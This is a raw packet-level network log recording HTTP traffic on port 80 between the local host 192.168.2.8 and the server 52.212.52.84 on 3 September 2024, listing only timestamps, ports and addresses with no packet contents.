Sep 3, 2024 17:13:22.730361938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730396032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730408907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730421066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730431080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730431080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730437994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730453014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730496883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730496883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730496883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730535030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.732037067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732050896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732064009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732076883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732093096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732100010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.732105970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732122898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.732141018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.732141018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.732177973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.820465088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820542097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820554972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820574999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.820574999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820591927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820605993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820612907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.820612907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.820621014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820642948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.820698023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.820755959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.820837975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821273088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821350098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821363926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821415901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821429014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821444035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821449041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821449041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821449041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821461916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821481943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821482897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821610928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821630955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821652889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821675062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821683884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821688890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821703911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821717978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821724892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821724892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821733952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821746111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.821752071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821789026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.821835041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.822844982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822860003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822875023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822922945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822937012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822947979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.822947979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.822951078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822968006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.822983980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823021889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823021889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823021889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823055029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823067904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823080063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823096037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823097944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823097944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823112011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823133945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823231936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.823252916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.823308945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.824836016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824848890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824861050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824922085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.824922085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.824944019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824955940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824965954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824976921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.824987888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825001955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825017929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825124979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825490952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825509071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825520039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825551987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825551987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825577021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825588942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825598955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825609922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825620890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825639009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825639009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825678110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825689077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825695038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825700045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825714111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825757980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825757980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825802088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825815916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825828075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825836897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825858116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825860023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825860023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825870037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825880051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825891018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825898886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825902939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.825967073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825967073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825967073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.825995922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826006889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826013088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826108932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826114893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826121092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826133013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826145887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826154947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826169968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826172113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826184988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826208115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826208115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826275110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826286077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826294899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826304913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826316118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826328993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826350927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826350927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826350927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826378107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826378107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826392889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826404095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826498985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826787949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826798916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826807976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826823950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826833963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826843977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.826870918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826870918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826900959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826901913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.826914072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827039003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827074051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827126026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827136993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827136993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827224016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827224970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827234983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827246904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827255964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827261925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827270031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827291012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827320099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827330112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827341080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827343941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827388048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827414989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827421904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827434063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827445030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827454090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.827483892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827483892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.827586889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.828242064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828253031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828263044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828314066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.828314066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.828327894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828340054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828349113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828358889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.828376055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.828680992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.829987049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.829999924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.830009937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.830024958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.830040932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.830053091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.830054998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.830065012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.830075979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.830120087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.830120087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.071659088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.071984053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072000980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072015047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072026968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072040081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072052002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072062016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072073936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072084904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072138071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072149992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072150946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072150946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072150946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072150946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072165966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072176933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072195053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072206020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072216988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072227955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072238922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072247028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072247028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072247028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072273970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072273970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072333097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072829962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072841883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072853088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072864056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072874069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072884083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072894096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072901964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072906017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072917938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072928905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072932005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072932005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072940111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072952986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072964907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072977066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.072978973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.072988987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073009968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073018074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073112011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073352098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073376894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073440075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073488951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073502064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073510885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073523045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073534012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073544979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073558092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073565960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073565960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073577881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073594093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073604107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073612928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073612928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073615074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073626995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073637962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073648930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073658943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073669910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073673010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073673010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073673010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073683023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073693991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073694944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073705912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073719025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073730946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073735952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073736906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073743105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073756933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.073785067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073785067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073812008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.073812008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074176073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074187994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074198008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074208975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074220896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074238062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074249029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074258089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074273109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074282885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074282885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074285030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074297905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074309111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074314117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074315071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074320078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074332952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074342966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074342966 CEST	80	49730	52.212.52.84	192.168.2.8
